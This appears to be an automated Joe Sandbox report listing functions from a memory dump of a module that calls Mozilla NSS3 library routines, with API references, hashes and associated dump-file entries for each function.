Instruction Fuzzy Hash: C84195B6A013158BCB18CF58DCE1796B7E1BF4431871D5A69C84AC7B02E379E891CBC1

Function 6C7C0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C7AC97F,?,?,?), ref: 6C7C04BF
TlsGetValue.KERNEL32(00000000,?,6C7AC97F,?,?,?), ref: 6C7C04F4
EnterCriticalSection.KERNEL32(?,?,?,6C7AC97F,?,?,?), ref: 6C7C050D
PR_Unlock.NSS3(?,?,?,?,6C7AC97F,?,?,?), ref: 6C7C0556

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: f31d480d343d4809d03231c6db8e949cc27129e27587344a260409313b944d5c
Instruction ID: b45e997a8415cb69eccdc4fbbf3c480504923ae6dbd6733aabb7cf30b560bf43
Opcode Fuzzy Hash: f31d480d343d4809d03231c6db8e949cc27129e27587344a260409313b944d5c
Instruction Fuzzy Hash: 184158B4A016428FDB14DF29D684A69BBF0BF44318F24853DD8A98BB01E730E991CBC1

Function 6C7E2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C7E1289,?), ref: 6C7E2D72

Part of subcall function 6C7E3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C7E2CA7,E80C76FF,?,6C7E1289,?), ref: 6C7E33E9
Part of subcall function 6C7E3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C7E342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E1289,?), ref: 6C7E2D61

Part of subcall function 6C7E0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7E0B21
Part of subcall function 6C7E0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C7E1289,?), ref: 6C7E2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C7E1289,?), ref: 6C7E2DAF

Part of subcall function 6C79B8F0: PR_CallOnceWithArg.NSS3(6C8D2178,6C79BCF0,?), ref: 6C79B915
Part of subcall function 6C79B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C79B933
Part of subcall function 6C79B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C79B9C8
Part of subcall function 6C79B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C79B9E1

Part of subcall function 6C7E0A50: SECOID_GetAlgorithmTag_Util.NSS3(6C7E2A90,E8571076,?,6C7E2A7C,6C7E21F1,?,?,?,00000000,00000000,?,?,6C7E21DD,00000000), ref: 6C7E0A66

Part of subcall function 6C7E3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C7E2D1E,?,?,?,?,00000000,?,?,?,?,?,6C7E1289), ref: 6C7E3348

Part of subcall function 6C7E06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C7E2E70,00000000), ref: 6C7E0701

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 5a015356914bf6ae675f53163a118a5c92b5578229b2475e386a58f78a6be281
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: E731AEB79002066BDB009E64DE49F9A3765BF4D31DF140134ED155BB91FB31E518C7A2

Function 6C776C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C776C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C776CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C776CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C898FE0), ref: 6C776CFE

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 9e3d487cde7e7a34c129a0986873402d6ecbb6b185af372faad925703a1c51a3
Instruction ID: ebfac83a40163580f0c04dee76e2852311eb2e54f0a060eb12593f4d31e897f1
Opcode Fuzzy Hash: 9e3d487cde7e7a34c129a0986873402d6ecbb6b185af372faad925703a1c51a3
Instruction Fuzzy Hash: A2319EB1A0021A9FDF18DF65CA85ABFBBF5EB45248F10443DD905D7700EB31A905CBA0

Function 6C884F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C884F5D
free.MOZGLUE(?), ref: 6C884F74
free.MOZGLUE(?), ref: 6C884F82
GetLastError.KERNEL32 ref: 6C884F90

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 6cb5f746638725229bc10de842fe5059d857883534ba92364e53b02c853593a0
Instruction ID: 2c54b8d3ecb3c1d67a9501ba21e894622d158427d69ffe1bfe78a111f5a4d42c
Opcode Fuzzy Hash: 6cb5f746638725229bc10de842fe5059d857883534ba92364e53b02c853593a0
Instruction Fuzzy Hash: 263168B6A012194BEB20CB69DD91BDFB3BCFFC5348F050628EC15A7B81DB34A905C691

Function 6C7E6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E6E57

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6EAA

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: b709fc53bce3df9bc22ec827df805178f3e8586dea0ca6cf211065e85d002192
Instruction ID: c9db8f4fcfca62db283fe530d222f892be1aa611a29f1e90b01568e1e6e60a5e
Opcode Fuzzy Hash: b709fc53bce3df9bc22ec827df805178f3e8586dea0ca6cf211065e85d002192
Instruction Fuzzy Hash: E431D77361061AEFDB245F34CE04396B7A8BB0931AF14063CDA99D6AC1EB30B654CF81

Function 6C7D8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,6C7D72EC), ref: 6C7D855A

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C7D72EC), ref: 6C7D859E
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C7D72EC), ref: 6C7D85B8
PR_SetError.NSS3(FFFFE005,00000000,?,6C7D72EC), ref: 6C7D8600

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
String ID:
API String ID: 1727503455-0
Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction ID: 8e43d385fcd3ac48d46c67627b26143d0bc818e5567f7c8b41a6629902f011fa
Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
Instruction Fuzzy Hash: 0021D871A102119BEB008F2DDE44B2B76A9AF8131CF67523AE866D7750EB31F805C7D1

Function 6C7604D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C7604F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C76053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C760558
GetLastError.KERNEL32 ref: 6C76057A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: 4e103b258913f6a73db3ed3b6ddcb62acffdc4763516f2e03dddbb7b70201be6
Instruction ID: ca0a12508a4737e416ab3c155713051c0ffcecf2fec4bd48e49de9d8426d54f3
Opcode Fuzzy Hash: 4e103b258913f6a73db3ed3b6ddcb62acffdc4763516f2e03dddbb7b70201be6
Instruction Fuzzy Hash: 89215071A002189FDB14DF99DD95AAEB7B8FF49308B108429E8099B351D775ED06CBD0

Function 6C7E2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7E2E08

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C7E2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C7E2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7E2E95

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 0bf9ec8fc506f9899080fb008a908a99e884f076d3db0ec8f05a67056932d27b
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 6F2129B2E003564BE700CF549E4C7AA3768AF9530CF260379DD085B742F7B1E598C292

Function 6C7D8680 Relevance: 6.1, APIs: 4, Instructions: 71threadCOMMON

Download Yara Rule

APIs

SEC_PKCS7DecoderStart.NSS3(6C7D8B00,00000000,?,?,6C7D89A0,?,6C7D8980), ref: 6C7D86CF

Part of subcall function 6C7DD430: PORT_NewArena_Util.NSS3(00000400), ref: 6C7DD43B
Part of subcall function 6C7DD430: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C7DD452
Part of subcall function 6C7DD430: PORT_ZAlloc_Util.NSS3(00000044), ref: 6C7DD48D
Part of subcall function 6C7DD430: PORT_NewArena_Util.NSS3(00000400), ref: 6C7DD4A0

SEC_PKCS7DecoderFinish.NSS3(?), ref: 6C7D8744
SEC_PKCS7DestroyContentInfo.NSS3(00000000), ref: 6C7D875B

Part of subcall function 6C7D8810: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C7D86AA), ref: 6C7D8851
Part of subcall function 6C7D8810: PR_GetCurrentThread.NSS3 ref: 6C7D8937

PR_GetCurrentThread.NSS3 ref: 6C7D8765

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_CurrentDecoderThread$ContentDestroyFinishGrow_InfoStart
String ID:
API String ID: 1507683295-0
Opcode ID: 41e3c1e648dcdc831be752d232339de3dc7b53faa8a6956acf61742ff8fec1e9
Instruction ID: feb063397195f65dc867d155e38651731cf7d59fd403d88944d14728bd391404
Opcode Fuzzy Hash: 41e3c1e648dcdc831be752d232339de3dc7b53faa8a6956acf61742ff8fec1e9
Instruction Fuzzy Hash: F7214CB15017009FE7108F75CA88B92BBE4BB08368F12992ED4AD8BA51DB71F454CFE5

Function 6C79ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C79ACC2

Part of subcall function 6C772F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C772F0A
Part of subcall function 6C772F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C772F1D

Part of subcall function 6C772AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C770A1B,00000000), ref: 6C772AF0
Part of subcall function 6C772AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C772B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C79AD5E

Part of subcall function 6C7B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C77B41E,00000000,00000000,?,00000000,?,6C77B41E,00000000,00000000,00000001,?), ref: 6C7B57E0
Part of subcall function 6C7B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C7B5843

CERT_DestroyCertList.NSS3(?), ref: 6C79AD36

Part of subcall function 6C772F50: CERT_DestroyCertificate.NSS3(?), ref: 6C772F65
Part of subcall function 6C772F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C772F83

free.MOZGLUE(?), ref: 6C79AD4F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 605ca0bbdca37a3856d683c59413c6db717d3d3860936c9cf3ff2c7eb9815d09
Instruction ID: e48584b79881dac24f78b49b7c23b702bbf5b2b29ce69eac56e3585dd4168cf1
Opcode Fuzzy Hash: 605ca0bbdca37a3856d683c59413c6db717d3d3860936c9cf3ff2c7eb9815d09
Instruction Fuzzy Hash: 7421D5B1D012188BEF20DF68EA0A5EEB7B4EF05218F054078D8157B711FB31AA49CBE1

Function 6C7B24E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7B24FF
EnterCriticalSection.KERNEL32(?), ref: 6C7B250F
PR_Unlock.NSS3(?), ref: 6C7B253C
PR_SetError.NSS3(00000000,00000000), ref: 6C7B2554

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: dc908e64b9a45ddda0b040d3031d9ead2f45cda11670c8d96bee6faa440ccb6c
Instruction ID: 04d287cc747d22f44b1fa657e8e6af3780dfad9b57dca6e3f3b01384ed713647
Opcode Fuzzy Hash: dc908e64b9a45ddda0b040d3031d9ead2f45cda11670c8d96bee6faa440ccb6c
Instruction Fuzzy Hash: B6112675E00118ABDB10AF68EE49AAB7B78EF46328B410174EC08AB701E731E954C7E1

Function 6C7CECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C7CF0AD,6C7CF150,?,6C7CF150,?,?,?), ref: 6C7CECBA

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C7CECD1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C7CED02

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C7CED5A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 015ef539dd593c02d58a54bd8e6401087966d9ae9e944c36f4bae413ee09b6c5
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: A521D4B1A017425FE700CF25DA49B52B7E4BFA4308F25C225E81C87661E770E594C7D1

Function 6C7FEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEE14

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(?,?,6C7E9767,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEE33

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

